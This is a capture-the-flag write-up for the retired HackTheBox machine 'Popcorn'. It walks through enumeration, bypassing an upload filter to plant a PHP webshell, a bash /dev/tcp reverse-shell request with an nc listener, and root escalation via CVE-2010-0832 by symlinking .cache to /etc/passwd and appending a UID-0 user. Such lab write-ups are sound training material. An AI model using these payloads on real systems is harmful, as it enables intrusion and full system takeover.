HackTheBox - Popcorn

OS Difficulty IP Address Status
Linux Medium Retired

This box was classified as a medium box by ch4p on HackTheBox. It is also categorized as a OSCP-style box on TJNull’s list. While enumerating port 80, we find an instance of TorrentHoster where we get to upload an image and bypass its filtering to get our initial foothold. For privilege escalation, we leverage CVE-2010-0832 to get root.

Phase 1 - Enumeration


As usual, we start off with a Nmap to identify open ports:

22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.12 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We find only two ports opened: (i) SSH (ii) HTTP

Port 80

Navigating to the webpage on port 80, we find simple texts:

enter image description here

Directory Buster

Doing a directory brute force, we find a few pages.

/index                (Status: 200) [Size: 177]
/test                 (Status: 200) [Size: 47034]
/torrent              (Status: 301) [Size: 310] [-->]
/rename               (Status: 301) [Size: 309] [-->]


enter image description here


enter image description here


enter image description here

We find TorrentHoster, which allows us to Sign Up for an account:

enter image description here

After we sign up and login, we find an upload page; where we can upload torrent files:

enter image description here

So, let’s test this upload feature. We go to the Kali website and a get torrent file; pass it to TorrentHoster:

enter image description here

Once uploaded, we notice that we can edit the file to contain an image for screenshot:

enter image description here

When we click to add an image, we get another window to upload in. We also notice that it only allows certain types of image types:

enter image description here

We get a upload successful message, and also can find the uploaded image in /torrent/upload:
enter image description here
enter image description here

Phase 2 - Exploitation

Testing Filters

There’s two methods to upload files, one through a torrent file and the other through an image. Let’s test through the image. If we submit a PHP shell, we get an “Invalid file”. So we have filters, as the image upload stated that only certain formats of images are to be uploaded.
There are three common ways for a website to check for valid types:

  1. File extension
  2. Content-Type header
  3. Magic Bytes

Bypassing Filters

Testing by add .php to the filename, doesn’t get blocked by the filter. So, we will replace the image contents with a PHP shell and name the file “cmd.php”:

enter image description here

And it works! We got a webshell.

enter image description here

GET /torrent/upload/7fe3d266746cd636e0b918516570592eb93c9a8a.php?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/>%261' HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: /torrent/=; /torrent/torrents.php=; /torrent/login.php=; /torrent/index.php=; saveit_0=4; saveit_1=0; /torrent/torrents.phpfirsttimeload=0; PHPSESSID=52e42c83cd4621e503c78b6863edda94
Upgrade-Insecure-Requests: 1
└─$ curl --data-urlencode  "cmd=bash -c 'bash -i >& /dev/tcp/ 0>&1'"

And we get in as www-data

└─$ nc -lvnp 9001    
listening on [any] 9001 ...
connect to [] from (UNKNOWN) [] 41373
bash: no job control in this shell
[email protected]:/home/george$ cat user.txt

Phase 3 - Privilege Escalation


pam_motd (aka the MOTD module) in libpam-modules before 1.1.0-2ubuntu1.1 in PAM on Ubuntu 9.10 and libpam-modules before 1.1.1-2ubuntu5 in PAM on Ubuntu 10.04 LTS allows local users to change the ownership of arbitrary files via a symlink attack on .cache in a user’s home directory, related to “user file stamps” and the motd.legal-notice file.

CVE-2010-0832, a vulnerability in the Linux Authentication System (PAM) where I can get it to make my current user the owner of any file on the system.

[email protected]:/home/george/.cache$ ls -la
-rw-r--r-- 1 george george    0 Mar 17  2017 motd.legal-displayed

The above file is currently empty because this file can lead to code execution as they are typically executed when a new session is created; in other words, logout and login. Googling around, we do find an exploit script on Exploit-DB exploit but let’s do this manually by analyzing the script.

SSH as www-data

If we try, we can’t delete the .cache directory in george’s home directory because its contents are owned by george and we are the www-data user. So, let’s go back to the www-data home directory, create a .ssh folder and generate a SSH key for us to login through.

[email protected]:/var/www$ mkdir .ssh
[email protected]:/var/www$ ssh-keygen -q -t rsa -N '' -C 'pam'
Enter file in which to save the key (/var/www/.ssh/id_rsa): 

[email protected]:/var/www$ ls -la .ssh
-rw------- 1 www-data www-data 1671 Nov 10 22:05 id_rsa
-rw-r--r-- 1 www-data www-data  385 Nov 10 22:05 id_rsa.pub

[email protected]:/var/www$ cp .ssh/id_rsa.pub .ssh/authorized_keys
[email protected]:/var/www$ chmod 600 .ssh/authorized_keys

Then we will copy the id_rsa and to our machine and login to Popcorn as www-data:

└─$ chmod 600 id_rsa-www   
└─$ ssh -i id_rsa-www [email protected]

[email protected]:~$

Now, if we notice; there’s .cache directory. Prior to our login with www-data, there wasn’t a .cache directory. So, let’s link delete .cache directory, link /etc/passwd to .cache and check /etc/passwd permission:

[email protected]:~$ ls -la
drwxr-xr-x  2 www-data www-data 4096 2021-11-10 22:09 .cache

[email protected]:~$ rm -rf .cache
[email protected]:~$ ln -s /etc/passwd .cache
[email protected]:~$ ls -la
lrwxrwxrwx  1 www-data www-data   11 2021-11-10 22:10 .cache -> /etc/passwd

[email protected]:~$ ls -l /etc/passwd
-rw-r--r-- 1 root root 1031 2017-03-17 19:07 /etc/passwd

As we can see above, /etc/passwd is owned by root. So, let’s logout and login back in:

[email protected]:~$ ls -l /etc/passwd
-rw-r--r-- 1 www-data www-data 1031 2017-03-17 19:07 /etc/passwd

And now we as the www-data user own the /etc/passwd file. Now we can generate a password hash, and add a user as root to the /etc/passwd file:

[email protected]:~$ openssl passwd -1 potato

[email protected]:~$ echo 'pot:$1$7ed1OlEg$5jLtFfmPRvmIyklX3.SLO1:0:0:pwned:/root:/bin/bash' >> /etc/passwd

Finally, login again, switch user to the added one and BAM!

[email protected]:~$ su - pot
[email protected]:~# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:~# cat /root/root.txt

We are root!